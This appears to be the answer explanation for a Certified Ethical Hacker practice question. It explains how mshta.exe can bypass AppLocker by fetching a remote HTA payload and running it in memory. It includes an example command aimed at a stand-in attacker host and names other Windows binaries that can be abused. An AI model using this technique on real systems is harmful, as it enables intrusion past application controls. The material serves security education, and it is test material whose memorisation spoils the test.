Certified Ethical Hacker (CEH) Practice Question

The Microsoft HTML Application Host (mshta.exe) is a signed Windows binary designed to run HTML Application (HTA) and JavaScript code. Because it is a trusted system binary, AppLocker typically allows it to execute even when other unsigned programs are blocked. By supplying a URL (for example, mshta.exe http://attacker/payload.hta), the utility retrieves the remote script and executes it entirely in memory, enabling code execution without writing a traditional executable to disk.

regsvr32.exe, wmic.exe, and certutil.exe are also legitimate binaries that can be abused, but they do not natively execute HTA or raw JavaScript files in memory. regsvr32 can run remote .sct scriptlets, wmic can start a separate process, and certutil is primarily used for file transfer and certificate management-additional steps would still be required to achieve in-memory execution of an HTA payload. Therefore, mshta.exe is the most direct choice for this scenario.